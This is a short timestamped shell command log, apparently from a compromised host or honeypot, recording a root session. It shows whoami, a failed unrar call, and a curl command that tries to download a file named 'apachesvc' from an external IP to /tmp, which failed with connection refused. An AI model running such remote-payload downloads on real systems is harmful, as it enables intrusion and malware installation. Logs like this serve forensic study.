[2026-04-22 12:03:11]
COMMAND: unrar -h
EXIT CODE: 127
STDOUT:
(no output)
STDERR:
/bin/sh: unrar: command not found
----------------------------------------
[2026-04-22 12:07:20]
COMMAND: /usr/bin/sh whoami
EXIT CODE: 126
STDOUT:
(no output)
STDERR:
/usr/bin/whoami: /usr/bin/whoami: cannot execute binary file
----------------------------------------
[2026-04-22 12:08:24]
COMMAND: whoami
EXIT CODE: 0
STDOUT:
root
----------------------------------------
[2026-04-22 12:16:40]
COMMAND: curl http://103.202.153.183:8443/apachesvc -o /tmp/apachesvc
EXIT CODE: 7
STDOUT:
(no output)
STDERR:
% Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed

  0     0    0     0    0     0      0      0 --:--:-- --:--:-- --:--:--     0curl: (7) Failed to connect to 103.202.153.183 port 8443: Connection refused
----------------------------------------
